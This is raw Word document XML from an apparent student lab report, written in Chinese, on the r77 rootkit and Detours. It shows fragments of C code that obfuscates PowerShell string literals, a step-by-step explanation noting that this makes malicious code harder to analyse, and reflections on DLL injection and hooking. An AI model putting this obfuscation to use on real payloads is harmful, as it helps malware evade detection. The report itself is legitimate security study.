        <w:t>L"'+[Char]("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StrCatW(obfuscatedChar, charNumber);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StrCatW(obfuscatedChar,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Append obfuscated version of this char.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StrCatW(newCommand, obfuscatedChar);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Append ending quote.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StrCatW(newCommand, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="A31515"/>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commandPtr += textLength + stringLength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Append remaining string after the last quoted string.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StrCatW(newCommand, commandPtr);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StrCpyW(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, newCommand);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FREE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(newCommand);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FREE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(random);</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eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</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这段代码是一个函数，用于对PowerShell命令中的字符串字面量进行混淆操作。函数接受一个LPWSTR类型的指针command，指向存储PowerShell命令的字符串。</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以下是代码的主要功能和步骤的分析：</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首先，函数分配了两个临时缓冲区newCommand和random，分别用于存储混淆后的命令和生成随机字节。</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接下来，函数使用GetRandomBytes函数生成16384个随机字节，并将其存储在random缓冲区中。GetRandomBytes函数的具体实现未在提供的代码段中给出，可能是一个自定义的函数，用于生成指定长度的随机字节。</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然后，函数使用两个指针commandPtr和randomPtr来遍历命令字符串和随机字节缓冲区。</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在循环中，函数使用StrStrIW函数查找命令字符串中的反引号（）字符，以定位字符串字面量的起始位置。然后，通过再次调用StrStrIW`函数和计算偏移，找到字符串字面量的结束位置。</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在找到字符串字面量的起始和结束位置后，函数根据两者之间的内容进行混淆操作。首先，将起始位置前的部分追加到newCommand缓冲区中。</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然后，将单引号（'）字符追加到newCommand缓冲区中，表示混淆后的字符串字面量的开始。</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接下来，函数迭代字符串字面量中的每个字符，并使用不同的混淆技术对字符进行处理。根据从随机字节缓冲区中读取的值，选择以下三种混淆技术之一：</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将字符作为字面量直接追加到obfuscatedChar缓冲区中。</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将字符用'+'x'+'的形式追加到obfuscatedChar缓冲区中。</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将字符用'+[Char](123)+'的形式追加到obfuscatedChar缓冲区中。</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这些混淆技术会根据随机字节的值进行随机选择。</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每次处理一个字符后，将混淆后的字符追加到newCommand缓冲区中。</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最后，将字符串字面量的结束引号（'）字符追加到newCommand缓冲区中，表示混淆后的字符串字面量的结束。</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更新commandPtr指针，跳过已处理的字符串字面量。</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循环结束后，将剩余的命令字符串追加到newCommand缓冲区中。</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最后，将newCommand缓冲区中的混淆后的命令复制回command指向的原始命令字符串，并释放临时缓冲区的内存。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="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综上所述，这段代码的作用是对PowerShell命令中的字符串字面量进行混淆，使用不同的技术替换字符，以增加代码的复杂性和可读性，使恶意代码更难以分析和理解。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="750" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pP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实验结论及心得体会</w:t>
      </w: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在进行实验中，我学习了r77和Detours这两个工具的使用，它们都是用于动态链接库（DLL）注入和函数挂钩的工具。下面是我的总结与感悟：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="750" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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r77是一个功能强大的DLL注入工具，它可以将自定义的DLL注入到目标进程中，并在目标进程的上下文中执行代码。通过r77，我学会了如何将自己编写的DLL注入到目标进程中，并利用注入的DLL执行自定义的操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="750" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Detours是一个用于函数挂钩的库，它可以拦截目标进程中的函数调用，并在调用之前或之后执行自定义的代码。通过Detours，我学会了如何使用函数挂钩来修改目标进程中的函数行为，比如在函数调用前后打印日志、修改参数或返回值等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="750" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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在实验中，我通过结合r77和Detours的使用，实现了一些有趣的功能。例如，我成功地注入了自定义的DLL到目标进程中，并使用Detours对目标进程的特定函数进行了挂钩。通过挂钩，我能够捕获函数的输入参数和返回值，并对其进行修改和记录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="750" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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这次实验让我深入了解了DLL注入和函数挂钩的原理和应用。我认识到，这些技术在实际的软件开发和安全研究中有着广泛的应用，比如实现调试器、病毒分析、代码注入等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="750" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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我还发现，r77和Detours的使用需要谨慎，因为错误的使用可能会导致目标进程崩溃或产生意外的行为。在实验中，我遇到了一些挑战，比如适配目标进程的位数、解决函数签名不匹配的问题等。这些问题都需要仔细调试和处理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="750" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="750" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>总的来说，通过这次实验，我对r77和Detours的使用有了更深入的了解。我学会了如何使用这些工具进行DLL注入和函数挂钩，并且意识到它们在软件开发和安全领域的重要性。这对我今后在相关领域的学习和工作中将会非常有帮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 w:name="新宋体">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iNzU1Njg1YmIxNzRlYjdmZDAyODZhMjg1ZmFjNjUifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00172A27"/>
    <w:rsid w:val="000A38B2"/>
    <w:rsid w:val="00161866"/>
    <w:rsid w:val="004F18E2"/>
    <w:rsid w:val="008028FC"/>
    <w:rsid w:val="00A07F76"/>
    <w:rsid w:val="00B556B0"/>
    <w:rsid w:val="00E12748"/>
    <w:rsid w:val="00F51A3F"/>
    <w:rsid w:val="010F24D4"/>
    <w:rsid w:val="0B154457"/>
    <w:rsid w:val="10736F2C"/>
    <w:rsid w:val="11770F3C"/>
    <w:rsid w:val="1A20311F"/>
    <w:rsid w:val="1F0819AA"/>
    <w:rsid w:val="29443598"/>
    <w:rsid w:val="299C31FE"/>
    <w:rsid w:val="2A850B35"/>
    <w:rsid w:val="336C155F"/>
    <w:rsid w:val="3E262028"/>
    <w:rsid w:val="41FC61FB"/>
    <w:rsid w:val="43163BC9"/>
    <w:rsid w:val="4361645B"/>
    <w:rsid w:val="4B83098E"/>
    <w:rsid w:val="4DF76AE3"/>
    <w:rsid w:val="51F21F4B"/>
    <w:rsid w:val="52501A6E"/>
    <w:rsid w:val="578E4297"/>
    <w:rsid w:val="57CA7E3B"/>
    <w:rsid w:val="6265500E"/>
    <w:rsid w:val="6327192E"/>
    <w:rsid w:val="69393F35"/>
    <w:rsid w:val="79BA3B83"/>
    <w:rsid w:val="7E14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3</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>158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异禀</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-30T15:56:22Z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6EDA694090B24EB091256E1F06EC8225_12</vt:lpwstr>
  </property>
</Properties>
</file>